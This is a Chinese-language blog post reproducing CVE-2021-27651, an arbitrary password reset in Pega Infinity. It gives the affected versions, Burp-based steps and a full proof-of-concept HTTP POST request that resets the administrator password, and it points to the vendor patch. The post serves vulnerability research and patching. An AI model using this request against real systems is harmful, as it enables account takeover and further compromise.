(CVE-2021-27651)Pega Infinity任意重置密码漏洞复现
linluhaijing
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
(CVE-2021-27651)Pega Infinity任意重置密码漏洞复现
1、 简介
PEGA infinity是美国PEGA公司的一个应用软件。提供从数字混乱过渡到真正的数字转换。
2、 漏洞描述
该漏洞允许攻击者可以直接重置任意账号的密码,从而配合系统内部中的功能达到getshell的目的。
3、 影响范围
Pega Infinity> = 8.2.1 Pega Infinity <= 8.5.2
4、 复现
访问http://192.168.2.193/会自动跳转至登录界面。
点击trouble logging in,后在输入账号administrator@pega.com,然后用burp进行抓包。
抓包后将poc复制进去,并进行更改,发送后即可重置administrator@pega.com
密码。
Poc:
POST /prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD HTTP/1.1 Host: redacted.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 112 Origin: https://redacted.com DNT: 1 Connection: close Referer: https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD Cookie: yourCookie Upgrade-Insecure-Requests: 1
pzAuth=guest&NewPassword=Linlu123&ConfPassword=Linlu123&pyActivity%3DCode-Security.pzChangeUserPassword=
账号密码:administrator@pega.com/linlu123
5、 漏洞防御
官方已公布最新补丁
https://collaborate.pega.com/discussion/pega-security-advisory-a21-hotfix-matrix
本文为 linluhaijing 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
用魔法打败魔法,教你如何制作钓鱼软件反制红队
2021-05-18
(CVE-2021-21315) Node.js systeminformation模块RCE
2021-05-14
CVE-2020-10204 Nexus Repository Manager 3 表达式解析漏洞 RCE复现
2021-05-13
文章目录